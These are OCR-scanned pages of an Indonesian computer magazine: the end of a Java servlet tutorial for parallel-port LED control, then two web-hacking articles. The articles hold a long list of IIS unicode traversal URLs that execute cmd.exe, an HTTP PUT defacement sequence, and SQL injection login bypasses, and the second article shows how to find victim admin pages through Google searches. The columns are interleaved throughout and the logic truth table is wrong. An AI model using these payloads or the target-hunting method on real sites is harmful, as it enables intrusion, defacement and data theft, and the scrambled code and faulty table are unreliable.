myIO io = new myIO(); else if(sST.equals("1"))
io.outputb(0x378, 0); nOR += aSquare[i];
} i++;
}
public void doGet(HttpServletRequest request, out = io.inputb(0x378);
HttpServletResponse response) out = (out | nOR) & nAND;
throws IOException, ServletException { io.outputb(0x378, out);
}
PrintWriter out = response.getWriter(); in = io.inputb(0x378);
response.setContentType("text/html"); for(i=0; i<8; i++) {
sMsg += ("LED #"+(i+1)+": ");
String Status = request.getParameter("Status"); if((in & aSquare[i]) > 0)
if(Status==null) sMsg += " Nyala";
myWriter(out, "Maaf, request-nya salah..."); else
else if(Status.toLowerCase().equals("baca")){ sMsg += " Padam";
String myMsg = myTask("r", null); sMsg += "<br>";
myWriter(out, myMsg); }
} else return sMsg;
myWriter(out, "Maaf, request-nya salah..."); }
}
void myWriter(PrintWriter out, String myMsg) {
public void doPost(HttpServletRequest request, String sMsg = "";
HttpServletResponse response) sMsg += "<html>\r\n";
throws IOException, ServletException { sMsg += "<head><title>Status LED</title></head>\r\n";
sMsg += "<body>\r\n";
PrintWriter out = response.getWriter(); sMsg += "<p align=center>\r\n";
response.setContentType("text/html"); sMsg += "<strong>Status LED</strong>\r\n";
sMsg += "<br><hr>\r\n";
String Status = request.getParameter("Status"); sMsg += "</p>\r\n";
String LED1 = request.getParameter("LED1"); sMsg += "<p align=left>\r\n";
String LED2 = request.getParameter("LED2"); sMsg += myMsg;
String LED3 = request.getParameter("LED3"); sMsg += "</p>\r\n";
String LED4 = request.getParameter("LED4"); sMsg += "<hr><br>\r\n";
String LED5 = request.getParameter("LED5"); sMsg += "&#149; <a href=index.html>Index</a>\r\n";
String LED6 = request.getParameter("LED6"); sMsg += "</body>\r\n";
String LED7 = request.getParameter("LED7"); sMsg += "</html>\r\n";
String LED8 = request.getParameter("LED8"); out.write(sMsg);
if(Status==null) out.flush();
myWriter(out, "Maaf, request-nya salah..."); }
else if(Status.toLowerCase().equals("tulis")){ }
// null -> diabaikan

20 NeoTek Vol. IV No. 05


NeoTutor

Yang perlu diperhatikan adalah kita harus me-reset Data Port Pada address bar ketik http://localhost/remote (Gambar 3),
ketika servlet pertama kali dipanggil sejak server dihidupkan. lalu pilih, Baca Status LED (Gambar 4).
Hal ini karema ketika komputer dihidupkan, BIOS melaku- Yang perlu diperhatikan adalah semua LED harus dalam
kan self-test yang salah satunya adalah untuk paralel port. keadaan padam, karena kondisi tersebut merupakan hasil
Untuk keperluan itu, gunakan method init(). Method init() inisialisasi (method init()).
hanya dijalankan sekali ketika servlet dipanggil pertama
kali sejak server (dalam hal ini Tomcat) dihidupkan.
Untuk menyalakan atau memadamkan LED mudah saja,
yaitu dengan memanfaatkan operasi-operasi logika seder-
hana. Untuk menyalakan LED, digunakan operasi OR de-
ngan 1. Sedangkan untuk memadamkan LED, diperguna-
kan operasi AND dengan 0. Untuk lebih jelasnya, Tabel 3.
Tabel 3.
Gambar 3 dan 4.
A B A or B A and B
0 0 1 0 Dapat juga gunakan DEBUG
0 1 1 0 untuk menguji, apakah per-
1 0 1 0 ubahan pada Data Port ter-
1 1 0 1 baca oleh servlet. Sebagai con-
Sebelum meng-compile-nya, jangan lupa untuk meng- toh, pada DEBUG berikan perintah o378, aa (Gambar 5),
copy file myIO.class ke folder classes dan _io_.dll ke lalu, pada browser lakukan refresh untuk melihat hasilnya
C:\WINDOWS (jangan salah!); serta atur setting untuk (Gambar 6).
CLASSPATH sebagai berikut:
set CLASSPATH= C:\jakarta-tomcat-3.2.3\lib\servlet.jar;C:

Kini, anda dapat meng-compile-nya menggunakan perintah:


javac myParalel.java
Gambar 5 dan 6.
Untuk membuat aliasnya, ketikkan file web.xml pada folder
WEB-INF dengan isi sebagai berikut: Sekarang, kita menguji penu-
lisan ke Data Port, sehingga
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE web-app
pada index.html pilih Ganti
PUBLIC "-//Sun Microsystems, Inc.//DTD Web Application Status LED. Lalu isi form
2.2//EN" yang tersedia (Gambar 7), klik
"http://java.sun.com/j2ee/dtds/web-app_2_2.dtd"> button Ganti dan hasilnya
<web-app> sebagai Gambar 8. Untuk
<servlet> melihat perubahannya men-
<servlet-name> gunakan DEBUG, ketikkan
myParalel perintah i378 (Gambar 9):
</servlet-name>
<servlet-class> Penutup
myParalel
</servlet-class> Aplikasi yang disajikan sederhana saja dengan maksud
</servlet> agar anda dapat memahaminya dengan mudah. Dengan
<servlet-mapping> sedikit kreativitas, anda dapat mengembangkan aplikasi ini.
<servlet-name>
myParalel Misalkan, untuk rangkaiannya digunakan microcontroller
</servlet-name> dengan memanfaatkan serial port sebagai media komuni-
<url-pattern> kasi antara PC dengan microcontroller untuk mengerjakan
/myRemote tugas-tugas yang lebih kompleks.
</url-pattern>
</servlet-mapping> Karena aplikasi ini menggunakan protokol HTTP, maka
</web-app> dengan sedikit modifikasi Anda dapat membuatnya
sebagai aplikasi WAP, sehingga terciptalah pengendalian
Kini, anda dapat menjalankan Tomcat: jarak jauh ber-
C:\jakarta-tomcat-3.2.3\bin\startup Gambar 2 basis WAP.

Pengujian
Anda dapat memasang rangkaian berikut pada soket untuk
printer yang terdapat pada PC Anda (Gambar 2). Gambar7, 8, dan 9
Jika Anda tidak sempat membuat rangkaian tersebut, Anda
dapat memanfaatkan DEBUG untuk melakukan pengujian.
Ada dua buah perintah yang akan kita gunakan, yaitu: I
untuk membaca dari suatu alamat port dan O untuk me-
nulis ke suatu alamat port. Keterangan lengkapnya bisa
Anda dapatkan dengan mengetikkan perintah ?.

Vol. IV No. 05 NeoTek 21


NeoTekno

WE B HAC K I N G
Kerawanan pada Port 80
World Wide Web merupakan bagian dari Internet yang paling populer, sehingga serangan paling
banyak terjadi lewat port 80 atau yang dikenal sebagai web hacking, berupa deface situs,
SQL injection, serta memanfaatkan kelemahan scripting maupun HTML form.
Internet merebak harum di Indonesia, bisa dikatakan mulai
A
RTIKEL INI DIANGKAT DARI BAHAN SEMINAR SECURITY
di Universitas Pelita Harapan yang dibawakan oleh pada hitungan tahun 90-an. Internet yang sebelumnya
S'to dari Jasakom. Terimakasih kepada S'to yang merupakan sebagai hal yang mustahil untuk dirasakan
telah memberikan izin menggunakan makalahnya untuk oleh rakyat kelas bawah, semakin terjangkau dengan laris-
ditulis ulang menjadi artikel ini. manisnya bermunculan warnet (warung internet).
Bicara mengenai web hacking, artikel ini membahasnya Ada ujaran yang mengatakan Kejahatan ada karena ada
dengan pendekatan 5W+1H (W What, Who, Why, When, kesempatan. Ujaran tersebut mungkin belum dapat dituju-
and Where + How). Jika salah urutan tak mengapalah. kan kepada pelaku web hacking. Dengan banyaknya keha-
diran warnet bahkan ada yang buka 24 jam, membuat web
WHAT: Apa itu Web Hacking? hacking dapat dilakukan kapan saja dan dimana saja, tanpa
Web hacking..., bukan hal baru lagi bagi jawara internet harus menunggu waktu.
(hacker) baik aliran putih maupun aliran hitam (cracker).
Apakah yang dimaksud dengan web hacking? Untuk men- HOW: Bagaimana Web Hacking Dilakukan?
dapatkan definisi kedua kata tersebut (w web dan hacking) Bagaimana seseorang melakukan web hacking? Internet
juga sebenarnya lumayan pusing. sudah hampir menjangkau segala sisi kehidupan yang ada
Secara semantik, web didefinisikan menjadi Data yang di- di dunia ini. Informasi mengenai web hacking dapat anda
representasikan di world wide web (Tim Berners-Lee, James temukan dengan berselancar ke Google. Google, search
Hendler, Ora Lassila. Scientific American, May 2001). Ada- engine yang terkenal menjawab pertanyaan Bagaimana.
pun hacking didefinisikan menjadi Tindakan di luar otoritas Dengan memasukkan kata (keyword) pada baris isian pen-
atau tindakan mematahkan/membobol mekanisme ke- carian maka anda akan dibawa ke tempat-tempat yang
amanan sebuah sistem informasi atau sistem jaringan berhubungan dengan web hacking. Anda tinggal memilih
http://www.tsl.state.tx.us/ld/pubs/compsecurity/glossary.html).
(h dan menyaringnya.
Jadi, singkatnya web hacking dapat diartikan Tindakan Seperti yang telah disinggung di atas, pelaku web hacking
menerobos mekanisme keamanan dari suatu sistem yang dapat siapa saja dan tanpa ada syarat-syarat tertentu. Hal
direpresentasikan dalam world wide web. ini disebabkan karena di internet terdapat banyak infor-
masi yang dapat diperoleh termasuk mengenai soal web
WHO: Siapa yang Melakukan Web Hacking? hacking. Informasi dapat berupa tutorial, tools, dan lain
sebagainya hingga akan membuat web hacking benar-benar
Menerobos mekanisme keamanan suatu jaringan, bukan-
mudah untuk dilakukan.
lah tindakan yang gampang untuk dilakukan. Jadi, siapa-
kah pelaku web hacking tersebut? Seiring perkembangan Unicode Bug pada Microsoft IIS
internet yang benar-benar pesat dan diiringi perkembang-
an security dan underground, membuat siapa saja dapat Untuk lebih menjelaskannya, mari kita tinjau masalah HOW
menjadi pelaku. Tidak ada keharusan bahwa pelaku web dari web hacking dengan bentuk studi kasus. Sebagai bahan
hacking adalah orang yang pintar komputer dan internet, studi kita yaitu e-commerce web. Mengapa pilihan ditetap-
atau lain sebagainya. Anda, saya, atau dia bisa saja menjadi kan e-commerce web? Karena e-commerce web merupa-
pelakunya. kan pilihan yang populer di kalangan para pelaku web hacking.
Gambar 1 menunjukkan contoh situs dalam studi kasus kita.
WHY: Mengapa Melakukan Web Hacking?
Jika semua bisa menjadi pelaku web hacking, tentu ada
alasan jika sampai melakukannya dan pertanyaan adalah
Mengapa? Jika pertanyaannya adalah Mengapa, biasanya
jawabannya adalah Karena. Ada banyak alasan orang
melakukan web hacking, diantaranya adalah:
1. Wanna Be A Hacker (ingin menjadi seorang hacker).
2. Mendapatkan popularitas.
3. Ingin mendapat puijian.
Alasan-alasan tersebut di atas cukup bisa dicerna logika.
Tapi bagaimana dengan alasan-alasan yang unik seperti
Nggak ada kerjaan, Suka-suka, Apa urusan loe, dan lain
sebagainya. Menurut hemat penulis, tanpa suatu alasan
apapun seseorang dapat saja melakukan web hacking.
WHEN and WHERE: Kapan dan Dimana? Gambar 1. Situs e-commerce dalam studi kasus kita.

22 NeoTek Vol. IV No. 05


NeoTekno

Gambar 3. Dengan TFTP, web


hacker meng-upload halaman
web yang sudah disiapkannya
menggantikan yang asli.

Gambar 2. Situs e-commerce Tabel 1. Daftar unicode bug


yang terkena deface. /msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
Suatu hari, pelanggan mem- /msadc/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c:\
buka situs web tersebut, /scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
dan melihat tampilan yang /scripts/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
sama sekali berbeda diban- /msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:\
dingkan sebelumnya. /msadc/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir+c:\
Web hacking telah terjadi. /msadc/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir+c:\
/msdac/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
Halaman utama e-commerce /msdac/..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:\
web ini telah telah di-ddeface /msdac/..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:\
oleh seseorang yang ber- /msdac/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c:\
/_vti_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir+c:\
nama B4d53ct0r. /_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?/c+dir+c:\
/_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../winnt/system32/cmd.exe?/c+dir+c:\
Bagaimana hal ini terjadi? /_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%../winnt/system32/cmd.exe?/c+dir+c:\
/PBServer/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
Deface banyak terjadi pada /PBServer/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:\
situs e-commerce web yang /PBServer/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:\
/PBServer/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c:\
menggunakan MS IIS. Ini /Rpc/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
dikarenakan adanya bug /Rpc/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:\
pada IIS yang dikenal se- /Rpc/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:\
/Rpc/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c:\
bagai unicode bug. Dengan /_vti_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir+c:\
adanya bug ini seseorang /_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?/c+dir+c:\
/_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../winnt/system32/cmd.exe?/c+dir+c:\
dapat mengakses command /_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63../winnt/system32/cmd.exe?/c+dir+c:\
line shell cmd.exe pada ser- /samples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
ver keluarga Windows NT. /cgi-bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/iisadmpwd/..%252f..%252f..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir+c:\
Kelemahan IIS ini sempat /_vti_cnf/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/adsamples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
ramai dibicarakan orang /scripts/..%C1%1C..%C1%1C..%C1%1C..%C1%1Cwinnt/system32/cmd.exe?/c+dir+c:\
karena banyaknya korban. /scripts/..%C1%9C..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%C0%AF..%C0%AF..%C0%AF..%C0%AFwinnt/system32/cmd.exe?/c+dir+c:\
Megakses server dengan /scripts/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir+c:\
memanfaatkan unicode /scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\
bug itu sendiri dilakukan /scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir+c:\
melalui service HTTP /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir+c:\
(port 80), port yang pasti /scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir+c:\
dibuka untuk memberikan /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\
layanan web. /scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
Tabel 1 menunjukkan daf- /_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
tar unicode bug yang dapat /scripts..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\
digunakan oleh pelaku web /scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir+c:\
hacking untuk menembus /scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir+c:\
Server IIS. /scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\
Pada kasus, setelah berhasil /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\
masuk ke sistem, pelaku /scripts/..%c1%af../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+dir+c:\
web hacking menggunakan /scripts/..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\
tool TFTP untuk melakukan /scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\
transfer terhadap halaman /msadc/..\%e0\%80\%af../..\%e0\%80\%af../..\%e0\%80\%af../winnt/system32/cmd.exe\?/c+dir+c:\
web dengan desain ‘kreatif’ /cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:
yang dimilikinya untuk /samples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
mengubah tampilan web /_vti_cnf/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
target. /_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/adsamples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\

Vol. IV No. 05 NeoTek 23


NeoTekno

Men-deface situs web lewat bug unicode Microsoft IIS ini Dengan memanfaatkan hanya perintah-perintah dasar dari
pernah dibahas cukup terinci di NeoTek III/03. Untuk itu HTTP, seorang hacker dapat men-deface suatu situs web.
silakan download file format PDF dari artikel ini lewat Berikut ini adalah perintah-perintah yang dijalankannya:
arsip NeoTek di www.neotek.co.id. OPTIONS * HTTP/1.1
Opsi Baca/Tulis pada Protokol HTTP PUT /file.ext HTTP/1.1
Host: hostname
Untuk mengamanankan sever IIS dari deface, server harus Content-Length: jumlahkarakter data yang dikirim
secara berkala di-update dengan sercvice pack dan hotfix
terbaru. Lebih baik lagi kalau situs e-commerce itu juga Terlihat bahwa hal ini terjadi karena setting server yang
dilindungi oleh firewall dan IDS (intrusion detection system). tidak sempurna. Untuk itu perlu dilakukan beberapa hal:
Tapi semua itu ternyata belum menjamin keamanan situs e- • Setting untuk menulis dari HTTP dihilangkan
commerce dari deface. Seperti pada contoh kasus kita, • Menggunakan security template dari Microsoft, NSA,
ternyata setelah semua usaha di atas, ternyata masih terkena dan lain sebagainya.
deface juga. Walaupun kini deface yang terjadi tidak terlalu
mempunyai nilai seni, tetapi tetap efektif (Gambar 4). • Menggunakan berbagai dokument setting server agar
aman
SQL Injection
Setting server dengan benar memang akan mengamankan
e-commerce web dari serangan deface, tetapi bukan berarti
semuanya sudah aman sekarang.
Situs e-commerce yang menggunakan Microsoft IIS juga
menggunakan database access dengan Micosoft SQL
server dan dibandingkan dengan SQL server yang lain,
MS SQL server mempunyai kelemahan yang memung-
kinkan seseorang tanpa account dapat masuk dan lolos
verifikasi dari MS SQL server..
Dari segi kerugian, hal ini lebih serius, sebab bisa saja data
sensitif seperti nomor kartu kredit serta lainnya bocor!
Pada saat seseorang berusaha masuk ke situs e-commerce,
biasanya akan disambut dengan halaman login yang meng-
haruskan pemakai memasukkan login name dan password
Gambar 4. Masih bisa terkena deface, padahal sudah
(Gambar 5).
menginstal Service Pack dan hotfix terbaru dari Microsoft, serta
melindungi server dengan firewall dan IDS.

Bagaimana hal ini bisa terjadi?


Hal ini dapat terjadi karena setting pada protokol HTTP 1.0
atau HTTP 1.1 yang merupakan protokol utama untuk web
itu sendiri, yaitu adanya opsi untuk dapat membaca dan me-
nulis lewat protokol-protokol ini.
HTTP 1.0
RFC 1945 (http://www.ietf.org/rfc/rfc1945.txt)
Finalized May 1996
Didukung oleh sebagian besar Web server dan browser
HTTP 1.1 Gambar 5. Layar login user name dan password serta
RFC 2616 (http://www.ietf.org/rfc/rfc2616.txt) perintah-perintah SQL dibaliknya untuk verfikasi.
Finalized 2001
Standard Baru Komunikasi Web Setelah pemakai memasukkan username dan password,
Beberapa perintah HTTP 1.0 secara umum SQL akan melakukan verfikasi terpadap
GET Untuk mengambil informasi dari sistem, seperti SQL query sebagai berikut:
halaman html SQLQuery = "SELECT Username FROM Users WHERE
GET /default.htm HTTP/1.0 Username = '" & strUsername & "' AND Password = '"
& strPassword & "'“
HEAD Untuk mengambil informasi mengenai system
Kelemahan verifikasi MS SQL disini mirip dengan kele-
HEAD HTTP/1.0 mahan unicode bug, yaitu tetap memproses (dengan bi-
(untuk menentukan OS/WEB) ngung) input-input ilegal pada username dan mengha-
POST Mengirimkan Informasi ke sistem silkan error page. Pada error page ini akan terbaca struk-
tur database-nya.
Perintah-perintah yang didukung HTTP 1.1.
Jadi kalau username-nya diisikan karakter-karakter ilegal
CONNECT*, DELETE*, GET, HEAD, OPTIONS, POST, seperti misalnya:
PUT, TRACE

24 NeoTek Vol. IV No. 05


NeoTekno

‘ OR ‘ ‘= Contoh scripting language yang bekerja di sisi client:


dan untuk password-nya disikan juga ‘ OR ‘ ‘= maka SQL • JavaScript
query akan membacanya sebagai: • Client side VB Script
SELECT Username FROM Users WHERE Username = ‘ ‘ Adapun scripting language di sisi server:L
OR ‘ ‘=‘ ‘ AND Password = ‘ ‘ OR ‘ ‘=‘ ‘ • ASP (Active Server Pages_
• JSP (Java Server Pages)
yang artinya SQL query akan memvalidasi username • PHP (Personal Home Page)
kosong (blank) dan password kosong sebagai user yang sah.
Kelemahan Dasar HTML Form
Keberhasilan SQL Injection ditandai dengan adanya
ODBC error, internal server error, masalah dalam mem- Setelah semua di atas diatasi, juga masih belum semuanya
proses request, syntax error, dan lain sebagainya. setaus persen aman. Pasalnya HTML sendiri, bahasa uni-
versal yang digunakan oleh web mempunyai karakteristik
Untuk mengatasi hal ini, atur agar: yang bisa disalahgunakan.
• Hanya karakter tertentu yang boleh diinput. Formulir dalam format HTML (HTML Form) adalah tam-
• Jika terdeteksi adanya illegal character, langsung tolak pilan yang digunakan untuk menampilkan jendela untuk
permintaan. memasukkan username dan password.
Angka Minus dalam Program Bisnis Setiap HTML form harus menggunakan salah satu metode
pengisian formulir, yaitu GET atau POST.
Pengamanan terhadap kelemahan SQL query bukan ber-
arti suatu situs e-commerce sudah aman. Yang banyak Berikut ini adalah kode HTML dari suatu login form:
terjadi adalah bahwa suatu situs e-commerce secara desain <form method=POST action=’/cgi-bin/login.cgi”>
memang sudah tidak aman. Hal ini terutama pada situs- <table border=0>
<tr>
situs yang menggunakan scripting language. <td>username:</td> <td>input name=user type=text width=20></td>
Pada kebanyakan program bisnis, tanda minus digunakan </tr>
untuk menandai pembayaran, sedangkan pemesanan ba- <tr>
<td>password:</td> <td>input name=pass type=password width=20></td>
rang tentunya tidak ada yang menggunakan tanda minus. </tr>
Tetapi cukup banyak situs e-commerce yang didesain </table>
<input type=submit value=”login”>
secara ceroboh dan tetap memproses tanda minus pada </form>
jumlah barang yang dipesan, misalnya. Hal ini apabila
dilakukan dengan kreatif, yaitu mengkombinasikan Melalui kedua metode HTTP ini (GET atau POST) para-
pesanan dengan jumlah barang negatif dan jumlah barang meter disampaikan ke aplikasi di sisi server.
lain yang positif, dalam prosesnya bisa mengakibatkan Masalahnya dengan menggunakan GET, variabel yang di-
pengiriman barang dilakukan tanpa mengharuskan adanya gunakan akan terlihat pada kotak URL, yang memung-
pembayaran. kinkan pengunjung langsung memasukkan karakter pada
form process, selain juga perintah GET dibatasi oleh string
sepanjang 2047 karakter. Variabel juga dapat diambil
dengan Request.QueryString.
POST biasa digunakan untuk mengirim data dalam jumlah
besar ke aplikasi di sisi server, sehingga tidak menggunakan
URL query string yang terbatas. POST juga lebih aman se-
bab variabel tidak terlihat oleh pengunjung, sehingga lebih
sulit dimainkan lewat perubahan nama variabel. Namun
variabel tetap dapat diambil dengan RequestForm.
Kesimpulan
• Hacking meliputi semua unsur dan tidak hanya pada
satu sisi sistem operasi.
• Tidak semua bug di ketahui pembuat software.
• Kesalahan konfigurasi adalah masalah umum yang di-
sebabkan penguasaan yang kurang atas suatu sistem
• Menjadi hacker itu mudah; hanya menggunakan tools
yang dibuat oleh hacker luar (script kiddies)
• Tidak diperlukan pengertian akan network, TCP/IP,
Assembly, C, dan lain-lain untuk menjadi Hacker
Gambar 6. JavaScript digunakan untuk memverifikasi angka minus. • Programmer handal bisa dengan mudah menjadi hacker
juga
JavaScript: Client Side Scripting • Serangan tidak hanya melalui network layer, tapi juga
JavaScript sendiri merupakan suatu scripting language yang application layer
dieksekusi di sisi client (komputer pengguna), sehingga • 70% serangan melalui port 80/aplikasi
suatu transaksi yang menggunakan JavaScript sebagai
scripting language-nya dapat dipastikan sangat rawan ter- • Kerugian terbesar berasal serangan dari orang dalam, dan
hadap manipulasi dari sisi pemakai. 80% serangan dilakukan oleh orang dalam.

Vol. IV No. 05 NeoTek 25


NeoTekno

WE B HAC K I N G
Database Hacking: SQL Injection
Lebih lanjut mengenai web hacking, Andi Ismayadi (Fuzk3_kendi@yahoo.com) membahas
lebih jauh tentang SQL Injection, sebagai oleh-olehnya dari tutorial on-line
di IRC chatroom #neoteker di Dal.net.
ETELAH BANYAKNYA BUG-BUG YANG BETEBARAN DI Gambar 1. Input string ' or
S internet dari unicode hingga yang baru-baru ini
menggemparkan jagad maya yaitu RPC Dcom,
1=1-- yang berbahaya...

sekarang muncul lagi satu lubang keamanan yang mem-


bahayakan sebuah websites. Jadi kalau diuraikan
logikanya adalah
SQL Injection atau dikenal juga dengan SQL insertion ada- bahwa SQL-nya
lah sebuah teknik yang digunakan untuk mengeksploitasi menganggap 1=1 se-
database pada suatu websites dengan memaksa keluarnya bagai true sehingga
error page situs itu yang pada error pages itu terdapat info kolom itu di-bypass
tentang struktur database website yang dieksploitasi.
SQL sendiri merupakan bahasa pemrograman database
yang sering dipakai para web developer maupun admin se-
buah situs untuk menampung ataupun menaruh data-data
baru dari suatu input yang masuk seperti input member
login, search engine, dan lain sebagainya.
Sebenarnya SQL injection sendiri bukanlah hal baru, dari
dulu teknik ini sudah dikenal dalam dunia hacking sebagai
salah satu teknik web hacking, namun baru muncul lagi
sekarang karena sifatnya yang dapat merusak database dari
suatu situs.
Teknik yang digunakan dalam SQL Injection adalah dengan
jalan menginput perintah-perintah standar dalam SQL
(DDL, DML, DCL) seperti CREATE, INSERT, UPDATE,
DROP, ALTER, UNION, SELECT dan perintah-perintah
lainnya yang tak asing lagi bagi anda yang sudah mengenal
SQL secara mendalam maupun yang baru saja belajar.
Dari berbagai jenis SQL dari MySQL, PostgreSQL, Nuke
SQL, dan MS-SQL, yang paling rentan terhadap SQL
Injection adalah MS-SQL.
Gambar 2. Hasil input string itu membuat kita dapat akses admin
Bahaya Default Setting
lalu kolom password-nya diabaikan karena setelah 1=1 ter-
Default setting SQl yang paling berbahaya adalah meng- dapat mark SQL ( -- ), sehingga password itupun diabaikan.
gunakan adminID = sa dan password blank alias kosong,
apabila ada direktori sebuah situs yang disitu ada input Lalu apakah hanya itu string-nya dalam menginjeksi sebuah
untuk adminnya maka kalau kita isi id-nya dengan = 'sa' situs? Tentu saja tidak. Inti dari injeksi dalam langkah awal-
dan passwordnya =' ' maka kita langsung masuk sebagai nya adalah memaksa keluar sebuah error page yang berisi
admin, ini kalau default setting-nya belum diubah. informasi struktur database situs itu dan kalau kita ingin
melihatnya kita harus men-debug-nya.
Namun ada lagi string yang bisa kita input untuk akses
sebagai web admin yaitu dengan string ' OR 1=1-- Jadi yang kita masukkan adalah string debugging SQL code,
yaitu ' having 1=1-- , ini adalah string yang harus dimasuk-
Nah apabila ada input web admin yang input box-nya adalah kan kalau kita ingin melihat error page dari situs sasaran.
User dan Password maka apabila kita masukan string ' OR
1=1-- di input box user dan masukan foobar di input box Mencari Target
password, maka akan membuat SQL query-nya bingung
Situs web MS-SQL dengan ASP adalah situs yang paling
diakibatkan jadi SQL Query membacanya sebagai:
rentan terhadap serangan ini. Jadi bagaimana jika kita ingin
SELECT * from users where User ='' or 1=1-- and Password mencari target yang menggunakan bahasa scripting ASP
='foobar' yang dapat kita serang?
yang artinya sqlnya men-SELECT semua query dari user Seperti biasa buka www.google.com nah, di kolom keyword-
yang user-nya '' (kosong) atau (OR) 1=1 (true) -- nya masukkan allinurl:.co.nz/admin.asp. Keyword ini dapat
(tanda -- adalah mark dari SQL seperti halnya di C/C++ anda modifikasi ke berbagai bentuk tapi intinya allinurl:
mark-nya // atau /*) harus dimasukkan karena Google akan mencari semua URL
dalam sebuah situs yang mempunyai direktori /admin.asp.

26 NeoTek Vol. IV No. 05


NeoTekno

Bisa saja anda ganti dengan allinurl:.co.id atau net atau org,
or.id, sampai allinurl:.fr/admin.asp semua tergantung krea-
tivitas anda dalam mencari target menggunakan Google, dan
yang terpenting dari semua itu adalah anda harus tahu di
mana harus menginput string SQL tadi, misalnya di member
login, user login, dan bahkan dapat pula di search product.

Gambar 5. Sebuah situs e-commerce yang di-inject melalui URL-


nya dengan debuging code.
Setelah itu akan keluar sebuah error page dari situs itu yang
memberi informasi tentang struktur database situs itu. Dari
hasil informasi yang kita dapat ini, kita dapat melakukan
